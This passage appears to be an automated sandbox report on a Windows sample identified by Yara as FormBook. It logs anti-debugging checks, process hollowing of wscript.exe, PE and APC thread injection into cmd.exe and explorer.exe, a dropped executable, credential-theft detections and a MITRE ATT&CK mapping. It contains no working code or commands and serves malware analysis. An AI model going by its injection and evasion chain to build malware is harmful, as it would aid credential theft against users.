Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D7E41 mov eax, dword ptr fs:[00000030h]	5_2_036D7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D7E41 mov eax, dword ptr fs:[00000030h]	5_2_036D7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D7E41 mov eax, dword ptr fs:[00000030h]	5_2_036D7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378AE44 mov eax, dword ptr fs:[00000030h]	5_2_0378AE44
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378AE44 mov eax, dword ptr fs:[00000030h]	5_2_0378AE44
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0377FE3F mov eax, dword ptr fs:[00000030h]	5_2_0377FE3F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CE620 mov eax, dword ptr fs:[00000030h]	5_2_036CE620
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CC600 mov eax, dword ptr fs:[00000030h]	5_2_036CC600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CC600 mov eax, dword ptr fs:[00000030h]	5_2_036CC600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CC600 mov eax, dword ptr fs:[00000030h]	5_2_036CC600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F8E00 mov eax, dword ptr fs:[00000030h]	5_2_036F8E00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781608 mov eax, dword ptr fs:[00000030h]	5_2_03781608
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FA61C mov eax, dword ptr fs:[00000030h]	5_2_036FA61C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FA61C mov eax, dword ptr fs:[00000030h]	5_2_036FA61C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F16E0 mov ecx, dword ptr fs:[00000030h]	5_2_036F16E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D76E2 mov eax, dword ptr fs:[00000030h]	5_2_036D76E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F36CC mov eax, dword ptr fs:[00000030h]	5_2_036F36CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03798ED6 mov eax, dword ptr fs:[00000030h]	5_2_03798ED6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0377FEC0 mov eax, dword ptr fs:[00000030h]	5_2_0377FEC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03708EC7 mov eax, dword ptr fs:[00000030h]	5_2_03708EC7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037446A7 mov eax, dword ptr fs:[00000030h]	5_2_037446A7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03790EA5 mov eax, dword ptr fs:[00000030h]	5_2_03790EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03790EA5 mov eax, dword ptr fs:[00000030h]	5_2_03790EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03790EA5 mov eax, dword ptr fs:[00000030h]	5_2_03790EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0375FE87 mov eax, dword ptr fs:[00000030h]	5_2_0375FE87
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EC577 mov eax, dword ptr fs:[00000030h]	5_2_036EC577
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EC577 mov eax, dword ptr fs:[00000030h]	5_2_036EC577
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03703D43 mov eax, dword ptr fs:[00000030h]	5_2_03703D43
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03743540 mov eax, dword ptr fs:[00000030h]	5_2_03743540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03773D40 mov eax, dword ptr fs:[00000030h]	5_2_03773D40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E7D50 mov eax, dword ptr fs:[00000030h]	5_2_036E7D50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378E539 mov eax, dword ptr fs:[00000030h]	5_2_0378E539
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0374A537 mov eax, dword ptr fs:[00000030h]	5_2_0374A537
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03798D34 mov eax, dword ptr fs:[00000030h]	5_2_03798D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F4D3B mov eax, dword ptr fs:[00000030h]	5_2_036F4D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F4D3B mov eax, dword ptr fs:[00000030h]	5_2_036F4D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F4D3B mov eax, dword ptr fs:[00000030h]	5_2_036F4D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D3D34 mov eax, dword ptr fs:[00000030h]	5_2_036D3D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CAD30 mov eax, dword ptr fs:[00000030h]	5_2_036CAD30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03778DF1 mov eax, dword ptr fs:[00000030h]	5_2_03778DF1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DD5E0 mov eax, dword ptr fs:[00000030h]	5_2_036DD5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DD5E0 mov eax, dword ptr fs:[00000030h]	5_2_036DD5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0378FDE2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0378FDE2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0378FDE2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0378FDE2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746DC9 mov eax, dword ptr fs:[00000030h]	5_2_03746DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746DC9 mov eax, dword ptr fs:[00000030h]	5_2_03746DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746DC9 mov eax, dword ptr fs:[00000030h]	5_2_03746DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746DC9 mov ecx, dword ptr fs:[00000030h]	5_2_03746DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746DC9 mov eax, dword ptr fs:[00000030h]	5_2_03746DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746DC9 mov eax, dword ptr fs:[00000030h]	5_2_03746DC9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F35A1 mov eax, dword ptr fs:[00000030h]	5_2_036F35A1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037905AC mov eax, dword ptr fs:[00000030h]	5_2_037905AC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037905AC mov eax, dword ptr fs:[00000030h]	5_2_037905AC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_036F1DB5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_036F1DB5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_036F1DB5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C2D8A mov eax, dword ptr fs:[00000030h]	5_2_036C2D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C2D8A mov eax, dword ptr fs:[00000030h]	5_2_036C2D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C2D8A mov eax, dword ptr fs:[00000030h]	5_2_036C2D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C2D8A mov eax, dword ptr fs:[00000030h]	5_2_036C2D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C2D8A mov eax, dword ptr fs:[00000030h]	5_2_036C2D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F2581 mov eax, dword ptr fs:[00000030h]	5_2_036F2581
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F2581 mov eax, dword ptr fs:[00000030h]	5_2_036F2581
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F2581 mov eax, dword ptr fs:[00000030h]	5_2_036F2581
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F2581 mov eax, dword ptr fs:[00000030h]	5_2_036F2581
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FFD9B mov eax, dword ptr fs:[00000030h]	5_2_036FFD9B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FFD9B mov eax, dword ptr fs:[00000030h]	5_2_036FFD9B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E746D mov eax, dword ptr fs:[00000030h]	5_2_036E746D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FA44B mov eax, dword ptr fs:[00000030h]	5_2_036FA44B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0375C450 mov eax, dword ptr fs:[00000030h]	5_2_0375C450
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0375C450 mov eax, dword ptr fs:[00000030h]	5_2_0375C450
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FBC2C mov eax, dword ptr fs:[00000030h]	5_2_036FBC2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0379740D mov eax, dword ptr fs:[00000030h]	5_2_0379740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0379740D mov eax, dword ptr fs:[00000030h]	5_2_0379740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0379740D mov eax, dword ptr fs:[00000030h]	5_2_0379740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781C06 mov eax, dword ptr fs:[00000030h]	5_2_03781C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746C0A mov eax, dword ptr fs:[00000030h]	5_2_03746C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746C0A mov eax, dword ptr fs:[00000030h]	5_2_03746C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746C0A mov eax, dword ptr fs:[00000030h]	5_2_03746C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746C0A mov eax, dword ptr fs:[00000030h]	5_2_03746C0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037814FB mov eax, dword ptr fs:[00000030h]	5_2_037814FB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746CF0 mov eax, dword ptr fs:[00000030h]	5_2_03746CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746CF0 mov eax, dword ptr fs:[00000030h]	5_2_03746CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03746CF0 mov eax, dword ptr fs:[00000030h]	5_2_03746CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03798CD6 mov eax, dword ptr fs:[00000030h]	5_2_03798CD6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D849B mov eax, dword ptr fs:[00000030h]	5_2_036D849B

Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 5_2_0370A3B0 NtGetContextThread,LdrInitializeThunk,

5_2_0370A3B0

HIPS / PFW / Operating System Protection Evasion

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\cmd.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: BA0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Users\Public\Libraries\Djfypqyfx.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\1a#U00bb.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 50410000	Jump to behavior
Source: C:\Users\user\Desktop\1a#U00bb.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: C00000	Jump to behavior
Source: C:\Users\user\Desktop\1a#U00bb.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: C10000	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\1a#U00bb.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 50410000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\1a#U00bb.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: C00000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\1a#U00bb.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: C10000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\1a#U00bb.exe

Memory written: C:\Windows\SysWOW64\cmd.exe base: 50410000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\cmd.exe

Thread APC queued: target process: C:\Users\Public\Libraries\Djfypqyfx.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 3968			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3968			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\1a#U00bb.exe

Thread created: C:\Windows\SysWOW64\cmd.exe EIP: C10000

Jump to behavior

Source: C:\Users\user\Desktop\1a#U00bb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k	Jump to behavior

Source: explorer.exe, 00000014.00000000.346636551.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.439909865.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.417804191.0000000000688000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000014.00000000.453872847.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.492123035.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.392685190.000000000813F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000014.00000000.492123035.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.441226718.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.349182130.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000014.00000000.492123035.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.441226718.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.349182130.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000014.00000000.347010107.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.440010023.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.491023361.000000000069D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000014.00000000.492123035.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.441226718.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.349182130.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: WProgram Manager

Source: C:\Users\Public\Libraries\Djfypqyfx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	812 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	812 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1a#U00bb.exe	32%	Virustotal		Browse
